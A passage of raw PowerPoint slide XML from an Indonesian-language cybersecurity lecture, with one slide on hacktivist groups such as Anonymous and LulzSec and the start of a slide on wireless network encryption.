            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan Hacktivist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Gambaran </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>historis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peretas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertindak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>individu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedikit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dana. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peretas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tunggal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperhitungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cenderung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelompok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Upaya </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kolaboratif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mampu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>canggih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kelompok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hacktivist, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anonymous, WikiLeaks, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>LulzSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>senjata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempromosikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> agenda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>politik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Para hacktivist </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksfiltrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merilis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ranah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merusak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disinformasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kelompok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>politik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, media, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keuangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target hacktivist, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelompok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>advokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hewan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menargetkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB01ABFF-EA85-4275-9F47-ADE2D33AB565}" type="slidenum">
              <a:rPr lang="en-ID" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="222378656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Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Nirkabel</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jangkauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melewati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pilihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Wi-Fi, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WLAN. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
